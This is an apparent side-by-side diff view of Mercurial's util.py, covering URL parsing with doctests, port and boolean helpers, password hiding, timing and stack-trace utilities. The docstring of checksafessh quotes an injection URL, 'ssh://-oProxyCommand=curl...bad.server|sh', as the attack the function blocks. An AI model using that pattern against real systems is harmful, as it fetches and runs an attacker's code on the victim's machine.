2735 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2730 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2736 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2731
2737
2732 def getport(port):
2738 def getport(port):
2733 """Return the port for a given network service.
2739 """Return the port for a given network service.
2734
2740
2735 If port is an integer, it's returned as is. If it's a string, it's
2741 If port is an integer, it's returned as is. If it's a string, it's
2736 looked up using socket.getservbyname(). If there's no matching
2742 looked up using socket.getservbyname(). If there's no matching
2737 service, error.Abort is raised.
2743 service, error.Abort is raised.
2738 """
2744 """
2739 try:
2745 try:
2740 return int(port)
2746 return int(port)
2741 except ValueError:
2747 except ValueError:
2742 pass
2748 pass
2743
2749
2744 try:
2750 try:
2745 return socket.getservbyname(pycompat.sysstr(port))
2751 return socket.getservbyname(pycompat.sysstr(port))
2746 except socket.error:
2752 except socket.error:
2747 raise Abort(_("no port number associated with service '%s'") % port)
2753 raise Abort(_("no port number associated with service '%s'") % port)
2748
2754
2749 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2755 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2750 '0': False, 'no': False, 'false': False, 'off': False,
2756 '0': False, 'no': False, 'false': False, 'off': False,
2751 'never': False}
2757 'never': False}
2752
2758
2753 def parsebool(s):
2759 def parsebool(s):
2754 """Parse s into a boolean.
2760 """Parse s into a boolean.
2755
2761
2756 If s is not a valid boolean, returns None.
2762 If s is not a valid boolean, returns None.
2757 """
2763 """
2758 return _booleans.get(s.lower(), None)
2764 return _booleans.get(s.lower(), None)
2759
2765
2760 _hextochr = dict((a + b, chr(int(a + b, 16)))
2766 _hextochr = dict((a + b, chr(int(a + b, 16)))
2761 for a in string.hexdigits for b in string.hexdigits)
2767 for a in string.hexdigits for b in string.hexdigits)
2762
2768
2763 class url(object):
2769 class url(object):
2764 r"""Reliable URL parser.
2770 r"""Reliable URL parser.
2765
2771
2766 This parses URLs and provides attributes for the following
2772 This parses URLs and provides attributes for the following
2767 components:
2773 components:
2768
2774
2769 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2775 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2770
2776
2771 Missing components are set to None. The only exception is
2777 Missing components are set to None. The only exception is
2772 fragment, which is set to '' if present but empty.
2778 fragment, which is set to '' if present but empty.
2773
2779
2774 If parsefragment is False, fragment is included in query. If
2780 If parsefragment is False, fragment is included in query. If
2775 parsequery is False, query is included in path. If both are
2781 parsequery is False, query is included in path. If both are
2776 False, both fragment and query are included in path.
2782 False, both fragment and query are included in path.
2777
2783
2778 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2784 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2779
2785
2780 Note that for backward compatibility reasons, bundle URLs do not
2786 Note that for backward compatibility reasons, bundle URLs do not
2781 take host names. That means 'bundle://../' has a path of '../'.
2787 take host names. That means 'bundle://../' has a path of '../'.
2782
2788
2783 Examples:
2789 Examples:
2784
2790
2785 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2791 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2786 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2792 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2787 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2793 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2788 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2794 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2789 >>> url(b'file:///home/joe/repo')
2795 >>> url(b'file:///home/joe/repo')
2790 <url scheme: 'file', path: '/home/joe/repo'>
2796 <url scheme: 'file', path: '/home/joe/repo'>
2791 >>> url(b'file:///c:/temp/foo/')
2797 >>> url(b'file:///c:/temp/foo/')
2792 <url scheme: 'file', path: 'c:/temp/foo/'>
2798 <url scheme: 'file', path: 'c:/temp/foo/'>
2793 >>> url(b'bundle:foo')
2799 >>> url(b'bundle:foo')
2794 <url scheme: 'bundle', path: 'foo'>
2800 <url scheme: 'bundle', path: 'foo'>
2795 >>> url(b'bundle://../foo')
2801 >>> url(b'bundle://../foo')
2796 <url scheme: 'bundle', path: '../foo'>
2802 <url scheme: 'bundle', path: '../foo'>
2797 >>> url(br'c:\foo\bar')
2803 >>> url(br'c:\foo\bar')
2798 <url path: 'c:\\foo\\bar'>
2804 <url path: 'c:\\foo\\bar'>
2799 >>> url(br'\\blah\blah\blah')
2805 >>> url(br'\\blah\blah\blah')
2800 <url path: '\\\\blah\\blah\\blah'>
2806 <url path: '\\\\blah\\blah\\blah'>
2801 >>> url(br'\\blah\blah\blah#baz')
2807 >>> url(br'\\blah\blah\blah#baz')
2802 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2808 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2803 >>> url(br'file:///C:\users\me')
2809 >>> url(br'file:///C:\users\me')
2804 <url scheme: 'file', path: 'C:\\users\\me'>
2810 <url scheme: 'file', path: 'C:\\users\\me'>
2805
2811
2806 Authentication credentials:
2812 Authentication credentials:
2807
2813
2808 >>> url(b'ssh://joe:xyz@x/repo')
2814 >>> url(b'ssh://joe:xyz@x/repo')
2809 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2815 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2810 >>> url(b'ssh://joe@x/repo')
2816 >>> url(b'ssh://joe@x/repo')
2811 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2817 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2812
2818
2813 Query strings and fragments:
2819 Query strings and fragments:
2814
2820
2815 >>> url(b'http://host/a?b#c')
2821 >>> url(b'http://host/a?b#c')
2816 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2822 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2817 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2823 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2818 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2824 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2819
2825
2820 Empty path:
2826 Empty path:
2821
2827
2822 >>> url(b'')
2828 >>> url(b'')
2823 <url path: ''>
2829 <url path: ''>
2824 >>> url(b'#a')
2830 >>> url(b'#a')
2825 <url path: '', fragment: 'a'>
2831 <url path: '', fragment: 'a'>
2826 >>> url(b'http://host/')
2832 >>> url(b'http://host/')
2827 <url scheme: 'http', host: 'host', path: ''>
2833 <url scheme: 'http', host: 'host', path: ''>
2828 >>> url(b'http://host/#a')
2834 >>> url(b'http://host/#a')
2829 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2835 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2830
2836
2831 Only scheme:
2837 Only scheme:
2832
2838
2833 >>> url(b'http:')
2839 >>> url(b'http:')
2834 <url scheme: 'http'>
2840 <url scheme: 'http'>
2835 """
2841 """
2836
2842
2837 _safechars = "!~*'()+"
2843 _safechars = "!~*'()+"
2838 _safepchars = "/!~*'()+:\\"
2844 _safepchars = "/!~*'()+:\\"
2839 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2845 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2840
2846
2841 def __init__(self, path, parsequery=True, parsefragment=True):
2847 def __init__(self, path, parsequery=True, parsefragment=True):
2842 # We slowly chomp away at path until we have only the path left
2848 # We slowly chomp away at path until we have only the path left
2843 self.scheme = self.user = self.passwd = self.host = None
2849 self.scheme = self.user = self.passwd = self.host = None
2844 self.port = self.path = self.query = self.fragment = None
2850 self.port = self.path = self.query = self.fragment = None
2845 self._localpath = True
2851 self._localpath = True
2846 self._hostport = ''
2852 self._hostport = ''
2847 self._origpath = path
2853 self._origpath = path
2848
2854
2849 if parsefragment and '#' in path:
2855 if parsefragment and '#' in path:
2850 path, self.fragment = path.split('#', 1)
2856 path, self.fragment = path.split('#', 1)
2851
2857
2852 # special case for Windows drive letters and UNC paths
2858 # special case for Windows drive letters and UNC paths
2853 if hasdriveletter(path) or path.startswith('\\\\'):
2859 if hasdriveletter(path) or path.startswith('\\\\'):
2854 self.path = path
2860 self.path = path
2855 return
2861 return
2856
2862
2857 # For compatibility reasons, we can't handle bundle paths as
2863 # For compatibility reasons, we can't handle bundle paths as
2858 # normal URLS
2864 # normal URLS
2859 if path.startswith('bundle:'):
2865 if path.startswith('bundle:'):
2860 self.scheme = 'bundle'
2866 self.scheme = 'bundle'
2861 path = path[7:]
2867 path = path[7:]
2862 if path.startswith('//'):
2868 if path.startswith('//'):
2863 path = path[2:]
2869 path = path[2:]
2864 self.path = path
2870 self.path = path
2865 return
2871 return
2866
2872
2867 if self._matchscheme(path):
2873 if self._matchscheme(path):
2868 parts = path.split(':', 1)
2874 parts = path.split(':', 1)
2869 if parts[0]:
2875 if parts[0]:
2870 self.scheme, path = parts
2876 self.scheme, path = parts
2871 self._localpath = False
2877 self._localpath = False
2872
2878
2873 if not path:
2879 if not path:
2874 path = None
2880 path = None
2875 if self._localpath:
2881 if self._localpath:
2876 self.path = ''
2882 self.path = ''
2877 return
2883 return
2878 else:
2884 else:
2879 if self._localpath:
2885 if self._localpath:
2880 self.path = path
2886 self.path = path
2881 return
2887 return
2882
2888
2883 if parsequery and '?' in path:
2889 if parsequery and '?' in path:
2884 path, self.query = path.split('?', 1)
2890 path, self.query = path.split('?', 1)
2885 if not path:
2891 if not path:
2886 path = None
2892 path = None
2887 if not self.query:
2893 if not self.query:
2888 self.query = None
2894 self.query = None
2889
2895
2890 # // is required to specify a host/authority
2896 # // is required to specify a host/authority
2891 if path and path.startswith('//'):
2897 if path and path.startswith('//'):
2892 parts = path[2:].split('/', 1)
2898 parts = path[2:].split('/', 1)
2893 if len(parts) > 1:
2899 if len(parts) > 1:
2894 self.host, path = parts
2900 self.host, path = parts
2895 else:
2901 else:
2896 self.host = parts[0]
2902 self.host = parts[0]
2897 path = None
2903 path = None
2898 if not self.host:
2904 if not self.host:
2899 self.host = None
2905 self.host = None
2900 # path of file:///d is /d
2906 # path of file:///d is /d
2901 # path of file:///d:/ is d:/, not /d:/
2907 # path of file:///d:/ is d:/, not /d:/
2902 if path and not hasdriveletter(path):
2908 if path and not hasdriveletter(path):
2903 path = '/' + path
2909 path = '/' + path
2904
2910
2905 if self.host and '@' in self.host:
2911 if self.host and '@' in self.host:
2906 self.user, self.host = self.host.rsplit('@', 1)
2912 self.user, self.host = self.host.rsplit('@', 1)
2907 if ':' in self.user:
2913 if ':' in self.user:
2908 self.user, self.passwd = self.user.split(':', 1)
2914 self.user, self.passwd = self.user.split(':', 1)
2909 if not self.host:
2915 if not self.host:
2910 self.host = None
2916 self.host = None
2911
2917
2912 # Don't split on colons in IPv6 addresses without ports
2918 # Don't split on colons in IPv6 addresses without ports
2913 if (self.host and ':' in self.host and
2919 if (self.host and ':' in self.host and
2914 not (self.host.startswith('[') and self.host.endswith(']'))):
2920 not (self.host.startswith('[') and self.host.endswith(']'))):
2915 self._hostport = self.host
2921 self._hostport = self.host
2916 self.host, self.port = self.host.rsplit(':', 1)
2922 self.host, self.port = self.host.rsplit(':', 1)
2917 if not self.host:
2923 if not self.host:
2918 self.host = None
2924 self.host = None
2919
2925
2920 if (self.host and self.scheme == 'file' and
2926 if (self.host and self.scheme == 'file' and
2921 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2927 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2922 raise Abort(_('file:// URLs can only refer to localhost'))
2928 raise Abort(_('file:// URLs can only refer to localhost'))
2923
2929
2924 self.path = path
2930 self.path = path
2925
2931
2926 # leave the query string escaped
2932 # leave the query string escaped
2927 for a in ('user', 'passwd', 'host', 'port',
2933 for a in ('user', 'passwd', 'host', 'port',
2928 'path', 'fragment'):
2934 'path', 'fragment'):
2929 v = getattr(self, a)
2935 v = getattr(self, a)
2930 if v is not None:
2936 if v is not None:
2931 setattr(self, a, urlreq.unquote(v))
2937 setattr(self, a, urlreq.unquote(v))
2932
2938
2933 @encoding.strmethod
2939 @encoding.strmethod
2934 def __repr__(self):
2940 def __repr__(self):
2935 attrs = []
2941 attrs = []
2936 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2942 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2937 'query', 'fragment'):
2943 'query', 'fragment'):
2938 v = getattr(self, a)
2944 v = getattr(self, a)
2939 if v is not None:
2945 if v is not None:
2940 attrs.append('%s: %r' % (a, v))
2946 attrs.append('%s: %r' % (a, v))
2941 return '<url %s>' % ', '.join(attrs)
2947 return '<url %s>' % ', '.join(attrs)
2942
2948
2943 def __bytes__(self):
2949 def __bytes__(self):
2944 r"""Join the URL's components back into a URL string.
2950 r"""Join the URL's components back into a URL string.
2945
2951
2946 Examples:
2952 Examples:
2947
2953
2948 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2954 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2949 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2955 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2950 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2956 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2951 'http://user:pw@host:80/?foo=bar&baz=42'
2957 'http://user:pw@host:80/?foo=bar&baz=42'
2952 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2958 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2953 'http://user:pw@host:80/?foo=bar%3dbaz'
2959 'http://user:pw@host:80/?foo=bar%3dbaz'
2954 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2960 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2955 'ssh://user:pw@[::1]:2200//home/joe#'
2961 'ssh://user:pw@[::1]:2200//home/joe#'
2956 >>> bytes(url(b'http://localhost:80//'))
2962 >>> bytes(url(b'http://localhost:80//'))
2957 'http://localhost:80//'
2963 'http://localhost:80//'
2958 >>> bytes(url(b'http://localhost:80/'))
2964 >>> bytes(url(b'http://localhost:80/'))
2959 'http://localhost:80/'
2965 'http://localhost:80/'
2960 >>> bytes(url(b'http://localhost:80'))
2966 >>> bytes(url(b'http://localhost:80'))
2961 'http://localhost:80/'
2967 'http://localhost:80/'
2962 >>> bytes(url(b'bundle:foo'))
2968 >>> bytes(url(b'bundle:foo'))
2963 'bundle:foo'
2969 'bundle:foo'
2964 >>> bytes(url(b'bundle://../foo'))
2970 >>> bytes(url(b'bundle://../foo'))
2965 'bundle:../foo'
2971 'bundle:../foo'
2966 >>> bytes(url(b'path'))
2972 >>> bytes(url(b'path'))
2967 'path'
2973 'path'
2968 >>> bytes(url(b'file:///tmp/foo/bar'))
2974 >>> bytes(url(b'file:///tmp/foo/bar'))
2969 'file:///tmp/foo/bar'
2975 'file:///tmp/foo/bar'
2970 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2976 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2971 'file:///c:/tmp/foo/bar'
2977 'file:///c:/tmp/foo/bar'
2972 >>> print(url(br'bundle:foo\bar'))
2978 >>> print(url(br'bundle:foo\bar'))
2973 bundle:foo\bar
2979 bundle:foo\bar
2974 >>> print(url(br'file:///D:\data\hg'))
2980 >>> print(url(br'file:///D:\data\hg'))
2975 file:///D:\data\hg
2981 file:///D:\data\hg
2976 """
2982 """
2977 if self._localpath:
2983 if self._localpath:
2978 s = self.path
2984 s = self.path
2979 if self.scheme == 'bundle':
2985 if self.scheme == 'bundle':
2980 s = 'bundle:' + s
2986 s = 'bundle:' + s
2981 if self.fragment:
2987 if self.fragment:
2982 s += '#' + self.fragment
2988 s += '#' + self.fragment
2983 return s
2989 return s
2984
2990
2985 s = self.scheme + ':'
2991 s = self.scheme + ':'
2986 if self.user or self.passwd or self.host:
2992 if self.user or self.passwd or self.host:
2987 s += '//'
2993 s += '//'
2988 elif self.scheme and (not self.path or self.path.startswith('/')
2994 elif self.scheme and (not self.path or self.path.startswith('/')
2989 or hasdriveletter(self.path)):
2995 or hasdriveletter(self.path)):
2990 s += '//'
2996 s += '//'
2991 if hasdriveletter(self.path):
2997 if hasdriveletter(self.path):
2992 s += '/'
2998 s += '/'
2993 if self.user:
2999 if self.user:
2994 s += urlreq.quote(self.user, safe=self._safechars)
3000 s += urlreq.quote(self.user, safe=self._safechars)
2995 if self.passwd:
3001 if self.passwd:
2996 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3002 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2997 if self.user or self.passwd:
3003 if self.user or self.passwd:
2998 s += '@'
3004 s += '@'
2999 if self.host:
3005 if self.host:
3000 if not (self.host.startswith('[') and self.host.endswith(']')):
3006 if not (self.host.startswith('[') and self.host.endswith(']')):
3001 s += urlreq.quote(self.host)
3007 s += urlreq.quote(self.host)
3002 else:
3008 else:
3003 s += self.host
3009 s += self.host
3004 if self.port:
3010 if self.port:
3005 s += ':' + urlreq.quote(self.port)
3011 s += ':' + urlreq.quote(self.port)
3006 if self.host:
3012 if self.host:
3007 s += '/'
3013 s += '/'
3008 if self.path:
3014 if self.path:
3009 # TODO: similar to the query string, we should not unescape the
3015 # TODO: similar to the query string, we should not unescape the
3010 # path when we store it, the path might contain '%2f' = '/',
3016 # path when we store it, the path might contain '%2f' = '/',
3011 # which we should *not* escape.
3017 # which we should *not* escape.
3012 s += urlreq.quote(self.path, safe=self._safepchars)
3018 s += urlreq.quote(self.path, safe=self._safepchars)
3013 if self.query:
3019 if self.query:
3014 # we store the query in escaped form.
3020 # we store the query in escaped form.
3015 s += '?' + self.query
3021 s += '?' + self.query
3016 if self.fragment is not None:
3022 if self.fragment is not None:
3017 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3023 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3018 return s
3024 return s
3019
3025
3020 __str__ = encoding.strmethod(__bytes__)
3026 __str__ = encoding.strmethod(__bytes__)
3021
3027
3022 def authinfo(self):
3028 def authinfo(self):
3023 user, passwd = self.user, self.passwd
3029 user, passwd = self.user, self.passwd
3024 try:
3030 try:
3025 self.user, self.passwd = None, None
3031 self.user, self.passwd = None, None
3026 s = bytes(self)
3032 s = bytes(self)
3027 finally:
3033 finally:
3028 self.user, self.passwd = user, passwd
3034 self.user, self.passwd = user, passwd
3029 if not self.user:
3035 if not self.user:
3030 return (s, None)
3036 return (s, None)
3031 # authinfo[1] is passed to urllib2 password manager, and its
3037 # authinfo[1] is passed to urllib2 password manager, and its
3032 # URIs must not contain credentials. The host is passed in the
3038 # URIs must not contain credentials. The host is passed in the
3033 # URIs list because Python < 2.4.3 uses only that to search for
3039 # URIs list because Python < 2.4.3 uses only that to search for
3034 # a password.
3040 # a password.
3035 return (s, (None, (s, self.host),
3041 return (s, (None, (s, self.host),
3036 self.user, self.passwd or ''))
3042 self.user, self.passwd or ''))
3037
3043
3038 def isabs(self):
3044 def isabs(self):
3039 if self.scheme and self.scheme != 'file':
3045 if self.scheme and self.scheme != 'file':
3040 return True # remote URL
3046 return True # remote URL
3041 if hasdriveletter(self.path):
3047 if hasdriveletter(self.path):
3042 return True # absolute for our purposes - can't be joined()
3048 return True # absolute for our purposes - can't be joined()
3043 if self.path.startswith(br'\\'):
3049 if self.path.startswith(br'\\'):
3044 return True # Windows UNC path
3050 return True # Windows UNC path
3045 if self.path.startswith('/'):
3051 if self.path.startswith('/'):
3046 return True # POSIX-style
3052 return True # POSIX-style
3047 return False
3053 return False
3048
3054
3049 def localpath(self):
3055 def localpath(self):
3050 if self.scheme == 'file' or self.scheme == 'bundle':
3056 if self.scheme == 'file' or self.scheme == 'bundle':
3051 path = self.path or '/'
3057 path = self.path or '/'
3052 # For Windows, we need to promote hosts containing drive
3058 # For Windows, we need to promote hosts containing drive
3053 # letters to paths with drive letters.
3059 # letters to paths with drive letters.
3054 if hasdriveletter(self._hostport):
3060 if hasdriveletter(self._hostport):
3055 path = self._hostport + '/' + self.path
3061 path = self._hostport + '/' + self.path
3056 elif (self.host is not None and self.path
3062 elif (self.host is not None and self.path
3057 and not hasdriveletter(path)):
3063 and not hasdriveletter(path)):
3058 path = '/' + path
3064 path = '/' + path
3059 return path
3065 return path
3060 return self._origpath
3066 return self._origpath
3061
3067
3062 def islocal(self):
3068 def islocal(self):
3063 '''whether localpath will return something that posixfile can open'''
3069 '''whether localpath will return something that posixfile can open'''
3064 return (not self.scheme or self.scheme == 'file'
3070 return (not self.scheme or self.scheme == 'file'
3065 or self.scheme == 'bundle')
3071 or self.scheme == 'bundle')
3066
3072
3067 def hasscheme(path):
3073 def hasscheme(path):
3068 return bool(url(path).scheme)
3074 return bool(url(path).scheme)
3069
3075
3070 def hasdriveletter(path):
3076 def hasdriveletter(path):
3071 return path and path[1:2] == ':' and path[0:1].isalpha()
3077 return path and path[1:2] == ':' and path[0:1].isalpha()
3072
3078
3073 def urllocalpath(path):
3079 def urllocalpath(path):
3074 return url(path, parsequery=False, parsefragment=False).localpath()
3080 return url(path, parsequery=False, parsefragment=False).localpath()
3075
3081
3076 def checksafessh(path):
3082 def checksafessh(path):
3077 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3083 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3078
3084
3079 This is a sanity check for ssh urls. ssh will parse the first item as
3085 This is a sanity check for ssh urls. ssh will parse the first item as
3080 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3086 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3081 Let's prevent these potentially exploited urls entirely and warn the
3087 Let's prevent these potentially exploited urls entirely and warn the
3082 user.
3088 user.
3083
3089
3084 Raises an error.Abort when the url is unsafe.
3090 Raises an error.Abort when the url is unsafe.
3085 """
3091 """
3086 path = urlreq.unquote(path)
3092 path = urlreq.unquote(path)
3087 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3093 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3088 raise error.Abort(_('potentially unsafe url: %r') %
3094 raise error.Abort(_('potentially unsafe url: %r') %
3089 (pycompat.bytestr(path),))
3095 (pycompat.bytestr(path),))
3090
3096
3091 def hidepassword(u):
3097 def hidepassword(u):
3092 '''hide user credential in a url string'''
3098 '''hide user credential in a url string'''
3093 u = url(u)
3099 u = url(u)
3094 if u.passwd:
3100 if u.passwd:
3095 u.passwd = '***'
3101 u.passwd = '***'
3096 return bytes(u)
3102 return bytes(u)
3097
3103
3098 def removeauth(u):
3104 def removeauth(u):
3099 '''remove all authentication information from a url string'''
3105 '''remove all authentication information from a url string'''
3100 u = url(u)
3106 u = url(u)
3101 u.user = u.passwd = None
3107 u.user = u.passwd = None
3102 return str(u)
3108 return str(u)
3103
3109
3104 timecount = unitcountfn(
3110 timecount = unitcountfn(
3105 (1, 1e3, _('%.0f s')),
3111 (1, 1e3, _('%.0f s')),
3106 (100, 1, _('%.1f s')),
3112 (100, 1, _('%.1f s')),
3107 (10, 1, _('%.2f s')),
3113 (10, 1, _('%.2f s')),
3108 (1, 1, _('%.3f s')),
3114 (1, 1, _('%.3f s')),
3109 (100, 0.001, _('%.1f ms')),
3115 (100, 0.001, _('%.1f ms')),
3110 (10, 0.001, _('%.2f ms')),
3116 (10, 0.001, _('%.2f ms')),
3111 (1, 0.001, _('%.3f ms')),
3117 (1, 0.001, _('%.3f ms')),
3112 (100, 0.000001, _('%.1f us')),
3118 (100, 0.000001, _('%.1f us')),
3113 (10, 0.000001, _('%.2f us')),
3119 (10, 0.000001, _('%.2f us')),
3114 (1, 0.000001, _('%.3f us')),
3120 (1, 0.000001, _('%.3f us')),
3115 (100, 0.000000001, _('%.1f ns')),
3121 (100, 0.000000001, _('%.1f ns')),
3116 (10, 0.000000001, _('%.2f ns')),
3122 (10, 0.000000001, _('%.2f ns')),
3117 (1, 0.000000001, _('%.3f ns')),
3123 (1, 0.000000001, _('%.3f ns')),
3118 )
3124 )
3119
3125
3120 _timenesting = [0]
3126 _timenesting = [0]
3121
3127
3122 def timed(func):
3128 def timed(func):
3123 '''Report the execution time of a function call to stderr.
3129 '''Report the execution time of a function call to stderr.
3124
3130
3125 During development, use as a decorator when you need to measure
3131 During development, use as a decorator when you need to measure
3126 the cost of a function, e.g. as follows:
3132 the cost of a function, e.g. as follows:
3127
3133
3128 @util.timed
3134 @util.timed
3129 def foo(a, b, c):
3135 def foo(a, b, c):
3130 pass
3136 pass
3131 '''
3137 '''
3132
3138
3133 def wrapper(*args, **kwargs):
3139 def wrapper(*args, **kwargs):
3134 start = timer()
3140 start = timer()
3135 indent = 2
3141 indent = 2
3136 _timenesting[0] += indent
3142 _timenesting[0] += indent
3137 try:
3143 try:
3138 return func(*args, **kwargs)
3144 return func(*args, **kwargs)
3139 finally:
3145 finally:
3140 elapsed = timer() - start
3146 elapsed = timer() - start
3141 _timenesting[0] -= indent
3147 _timenesting[0] -= indent
3142 stderr.write('%s%s: %s\n' %
3148 stderr.write('%s%s: %s\n' %
3143 (' ' * _timenesting[0], func.__name__,
3149 (' ' * _timenesting[0], func.__name__,
3144 timecount(elapsed)))
3150 timecount(elapsed)))
3145 return wrapper
3151 return wrapper
3146
3152
3147 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3153 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3148 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3154 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3149
3155
3150 def sizetoint(s):
3156 def sizetoint(s):
3151 '''Convert a space specifier to a byte count.
3157 '''Convert a space specifier to a byte count.
3152
3158
3153 >>> sizetoint(b'30')
3159 >>> sizetoint(b'30')
3154 30
3160 30
3155 >>> sizetoint(b'2.2kb')
3161 >>> sizetoint(b'2.2kb')
3156 2252
3162 2252
3157 >>> sizetoint(b'6M')
3163 >>> sizetoint(b'6M')
3158 6291456
3164 6291456
3159 '''
3165 '''
3160 t = s.strip().lower()
3166 t = s.strip().lower()
3161 try:
3167 try:
3162 for k, u in _sizeunits:
3168 for k, u in _sizeunits:
3163 if t.endswith(k):
3169 if t.endswith(k):
3164 return int(float(t[:-len(k)]) * u)
3170 return int(float(t[:-len(k)]) * u)
3165 return int(t)
3171 return int(t)
3166 except ValueError:
3172 except ValueError:
3167 raise error.ParseError(_("couldn't parse size: %s") % s)
3173 raise error.ParseError(_("couldn't parse size: %s") % s)
3168
3174
3169 class hooks(object):
3175 class hooks(object):
3170 '''A collection of hook functions that can be used to extend a
3176 '''A collection of hook functions that can be used to extend a
3171 function's behavior. Hooks are called in lexicographic order,
3177 function's behavior. Hooks are called in lexicographic order,
3172 based on the names of their sources.'''
3178 based on the names of their sources.'''
3173
3179
3174 def __init__(self):
3180 def __init__(self):
3175 self._hooks = []
3181 self._hooks = []
3176
3182
3177 def add(self, source, hook):
3183 def add(self, source, hook):
3178 self._hooks.append((source, hook))
3184 self._hooks.append((source, hook))
3179
3185
3180 def __call__(self, *args):
3186 def __call__(self, *args):
3181 self._hooks.sort(key=lambda x: x[0])
3187 self._hooks.sort(key=lambda x: x[0])
3182 results = []
3188 results = []
3183 for source, hook in self._hooks:
3189 for source, hook in self._hooks:
3184 results.append(hook(*args))
3190 results.append(hook(*args))
3185 return results
3191 return results
3186
3192
3187 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3193 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3188 '''Yields lines for a nicely formatted stacktrace.
3194 '''Yields lines for a nicely formatted stacktrace.
3189 Skips the 'skip' last entries, then return the last 'depth' entries.
3195 Skips the 'skip' last entries, then return the last 'depth' entries.
3190 Each file+linenumber is formatted according to fileline.
3196 Each file+linenumber is formatted according to fileline.
3191 Each line is formatted according to line.
3197 Each line is formatted according to line.
3192 If line is None, it yields:
3198 If line is None, it yields:
3193 length of longest filepath+line number,
3199 length of longest filepath+line number,
3194 filepath+linenumber,
3200 filepath+linenumber,
3195 function
3201 function
3196
3202
3197 Not be used in production code but very convenient while developing.
3203 Not be used in production code but very convenient while developing.
3198 '''
3204 '''
3199 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3205 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3200 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3206 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3201 ][-depth:]
3207 ][-depth:]
3202 if entries:
3208 if entries:
3203 fnmax = max(len(entry[0]) for entry in entries)
3209 fnmax = max(len(entry[0]) for entry in entries)
3204 for fnln, func in entries:
3210 for fnln, func in entries:
3205 if line is None:
3211 if line is None:
3206 yield (fnmax, fnln, func)
3212 yield (fnmax, fnln, func)
3207 else:
3213 else:
3208 yield line % (fnmax, fnln, func)
3214 yield line % (fnmax, fnln, func)
3209
3215
3210 def debugstacktrace(msg='stacktrace', skip=0,
3216 def debugstacktrace(msg='stacktrace', skip=0,
3211 f=stderr, otherf=stdout, depth=0):
3217 f=stderr, otherf=stdout, depth=0):
3212 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3218 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
